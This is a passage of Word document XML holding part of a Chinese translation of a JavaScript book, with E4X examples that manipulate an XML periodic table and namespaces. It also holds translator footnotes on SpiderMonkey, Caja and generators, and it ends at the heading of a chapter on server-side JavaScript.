        <w:t>标签和属性列表。</w:t>
      </w:r>
      <w:r>
        <w:t>for/each</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环非常类似，</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环用以遍历对象的属性名，</w:t>
      </w:r>
      <w:r>
        <w:t>for/each</w:t>
      </w:r>
      <w:r>
        <w:t>循环用以遍历对象的属性值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>输出元素周期表中的每个元素名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for each(var e in pt.element){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(e.name);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>输出每个元素的原子序数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for each(var n in pt.element.@*)console.log(n);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>表达式可以出现在赋值语句的左侧，可以用它来对已存在的标签和属性进行修改或添加新标签或属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>修改氢元素的＜</w:t>
      </w:r>
      <w:r>
        <w:t>element</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签，给它添加一个新属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>像下面这样添加一个子元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>element id="1"symbol="H"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Hydrogen</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/name</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>weight</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1.00794</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/weight</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/element</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pt.element[0]</w:t>
      </w:r>
      <w:r>
        <w:t>.@symbol="H";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pt.element[0].weight=1.00794;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过标准的</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>运算符也可以方便地删除属性和标签：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete pt.element[0].@symbol;//</w:t>
      </w:r>
      <w:r>
        <w:t>删除一个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete pt..weight;//</w:t>
      </w:r>
      <w:r>
        <w:t>删除所有的＜</w:t>
      </w:r>
      <w:r>
        <w:t>widget</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>所提供的语法来进行大部分的</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>操作。</w:t>
      </w:r>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>同样定义了能够调用</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法，例如，这里用到了</w:t>
      </w:r>
      <w:r>
        <w:t>insertChildBefore()</w:t>
      </w:r>
      <w:r>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pt.insertChildBefore(pt.e</w:t>
      </w:r>
      <w:r>
        <w:t>lement[1],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>element id="1"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Deuterium</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/name</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/element</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>中是完全支持命名空间的，它为使用</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>命名空间提供了语法支持和</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>支持：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>声明默认的命名空间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>default xml namespace="http://www.w3.org/1999/xhtml";//</w:t>
      </w:r>
      <w:r>
        <w:t>这里也是一个包含一些</w:t>
      </w:r>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:r>
        <w:t>标签的</w:t>
      </w:r>
      <w:r>
        <w:t>xhtml</w:t>
      </w:r>
      <w:r>
        <w:t>文档</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>d=</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>This is a small red square:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">svg </w:t>
      </w:r>
      <w:r>
        <w:t>xmlns="http://www.w3.org/2000/svg"width="10"height="10"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>rect x="0"y="0"width="10"height="10"fill="red"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/svg</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/body</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/html</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>//body</w:t>
      </w:r>
      <w:r>
        <w:t>元素和它的命名空间里的</w:t>
      </w:r>
      <w:r>
        <w:t>uri</w:t>
      </w:r>
      <w:r>
        <w:t>及其</w:t>
      </w:r>
      <w:r>
        <w:t>localName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var tagname=d.body.name();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var bodyns=tagname.uri;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>localname=tagname.localName;//</w:t>
      </w:r>
      <w:r>
        <w:t>选择＜</w:t>
      </w:r>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素需要多做一些工作，因为＜</w:t>
      </w:r>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:r>
        <w:t>＞不在默认的命名空间中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>因此需要为</w:t>
      </w:r>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个命名空间，并使用</w:t>
      </w:r>
      <w:r>
        <w:t>::</w:t>
      </w:r>
      <w:r>
        <w:t>运算符将命名空间添加至标签名中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var svg=new Namespace('http://www.w3.org/2000/svg');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var color=d..svg::rect.@fill//"red"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>引擎有很多种，大多数是我们熟悉的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>猴</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>系列，文中所提到的</w:t>
      </w:r>
      <w:r>
        <w:t>Spidermonke</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>（用于</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 1.0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>3.0</w:t>
      </w:r>
      <w:r>
        <w:t>）便是其中一种，此外还包括</w:t>
      </w:r>
      <w:r>
        <w:t>TraceMonkey</w:t>
      </w:r>
      <w:r>
        <w:t>（用于</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 3.5</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>3.6</w:t>
      </w:r>
      <w:r>
        <w:t>）、</w:t>
      </w:r>
      <w:r>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:r>
        <w:t>（用于</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox4.0</w:t>
      </w:r>
      <w:r>
        <w:t>）以及最新开发的</w:t>
      </w:r>
      <w:r>
        <w:t>IonMonkey</w:t>
      </w:r>
      <w:r>
        <w:t>。有关</w:t>
      </w:r>
      <w:r>
        <w:t>Spidermonkey</w:t>
      </w:r>
      <w:r>
        <w:t>的更多信息可参照：</w:t>
      </w:r>
      <w:r>
        <w:t>http://en.wikipedia.org/wiki/SpiderMonkey</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>理论上，只要是</w:t>
      </w:r>
      <w:r>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r>
        <w:t>血统的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>引擎的开发环境都可以支持文中提到的扩展特性。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>这里所说的双重身份是指浏览器窗口对象除了作为普通的</w:t>
      </w:r>
      <w:r>
        <w:t>全局对象之外，还能通过它们去操作浏览器和</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>外观面板</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>代理对象</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>是设计模式中的两个术语，分别对应</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>外观模式</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>代理模式</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。更多内容请参照</w:t>
      </w:r>
      <w:r>
        <w:t>http://zh.wikipedia.org/wiki/</w:t>
      </w:r>
      <w:r>
        <w:t>外观模式和</w:t>
      </w:r>
      <w:r>
        <w:t>http://zh.wikipedia.org/wiki/</w:t>
      </w:r>
      <w:r>
        <w:t>代理模式。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>详情请参照</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.sitepen.com/blog/2008/08/01/secure-mashups-with-dojoxsecure</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>Caja</w:t>
      </w:r>
      <w:r>
        <w:t>是西班牙语，意思是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>沙盒</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Caja</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>详情请参照：</w:t>
      </w:r>
      <w:r>
        <w:t>http://code.google.com/p/google-caja/</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>原文是</w:t>
      </w:r>
      <w:r>
        <w:t>"It expects the version number times ten"</w:t>
      </w:r>
      <w:r>
        <w:t>，作者表述有误，应当是版本号乘以</w:t>
      </w:r>
      <w:r>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:t>而不是乘以</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>。在命令行环境中，直接执行</w:t>
      </w:r>
      <w:r>
        <w:t>version()</w:t>
      </w:r>
      <w:r>
        <w:t>可以返回当前采用的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>版本号，返回值通常为</w:t>
      </w:r>
      <w:r>
        <w:t>150</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>160</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>170</w:t>
      </w:r>
      <w:r>
        <w:t>等。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r>
        <w:t>生成器有时也叫做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>生成器迭代器</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>generator iterator</w:t>
      </w:r>
      <w:r>
        <w:t>），用以区分创建它的生成器函数。在本章里，我们统一使用术语</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>生成器</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>来表示</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>生成器迭代器</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，在其他参考文献中，生成器可能会同时指代生成器函数和生成器迭代器。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:r>
        <w:t>本书撰稿时，</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>还未开始支持生成器表达式。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[10]</w:t>
      </w:r>
      <w:r>
        <w:t>本书撰稿时，</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>还未开始支持生成器表达式。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[11]</w:t>
      </w:r>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>是由</w:t>
      </w:r>
      <w:r>
        <w:t>ECMA-357</w:t>
      </w:r>
      <w:r>
        <w:t>规范定义的，可以从这里查看官方文档：</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.ecma-international.org/publications/standards/Ecma-357.htm</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="293" w:name="Di_12Zhang__Fu_Wu_Qi_Duan_JavaScript"/>
      <w:bookmarkStart w:id="294" w:name="Di_12Zhang__Fu_Wu_Qi_Duan_JavaScript____"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>章　服务器端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
